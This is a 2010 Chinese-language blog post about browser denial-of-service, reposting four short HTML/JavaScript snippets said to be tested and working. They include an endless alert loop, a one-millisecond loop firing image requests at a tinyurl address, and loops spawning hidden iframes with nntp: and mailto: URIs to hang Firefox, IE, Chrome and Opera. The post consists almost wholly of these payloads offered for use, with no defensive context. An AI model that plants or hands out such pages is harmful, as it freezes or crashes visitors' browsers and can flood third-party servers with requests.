分类

学习笔记 [17]
渗透测试 [4]
一些杂文 [14]
coding [16]
漏洞信息 [17]
技术文章 [15]
开发文档 [8]
个人作品 [5]
PS:个人作品在各种下载栏目均有下载

站内搜索

日历

«  June 2010  »
Su Mo Tu We Th Fr Sa
  12345
6789101112
13141516171819
20212223242526
27282930

访问统计(起于2010/10/2)

访问统计
PortWatcher's Blog
Monday, 2025-06-30, 4:15 AM
Welcome Guest
Main | Registration | Login | RSS

Blog

Main » 2010 » June » 05 » 关于浏览器的DOS
11:56 PM
关于浏览器的DOS
黑防的大大幻泉整理的````可行性很高````代码测试均通过````

代码1

Code

<script>  
while(1)alert('hello world');  
</script>

代码2

Code


<html>  
<head>  
<title>Firefox DoS Exploit </title>  
<script>  
function DoS() {  
  img = new Image();  
  img.src = "http://tinyurl.com/5364";  
  setTimeout(DoS,1);  
}  
</script>  
</head>  
<body onLoad="DoS()">  
</body>  
</html>  

代码3

Code

<html>  
<head>  
<title>Firefox, IE & Opera DoS Exploit </title>  
<script>  
var iframe;  
function DoS(){  
  iframe = document.createElement("IFRAME");  
  iframe.src = "nntp://1";  
  iframe.style.visibility = "hidden";  
  document.body.appendChild(iframe);  
  setTimeout(DoS,1);}  
</script>  
</head>  
<body onLoad="DoS()"></body>  
</html>

代码4

Code

<html>  
<head>  
<title>Firefox, IE, Chrome & Opera DoS Exploit DoS </title>  
<script>  
var iframe;  
function DoS() {  
  iframe = document.createElement("IFRAME");  
  iframe.src = "mailto:test@test.com";  
  iframe.style.visibility = "hidden";  
  document.body.appendChild(iframe);  
  setTimeout(DoS,1);  
}  
</script>  
</head>  
<body onLoad="DoS()">  
</body>  
</html>
Category: coding | Views: 749 | Added by: Jury | Rating: 4.0/1
Total comments: 0
Name *:
Email *:
Code *: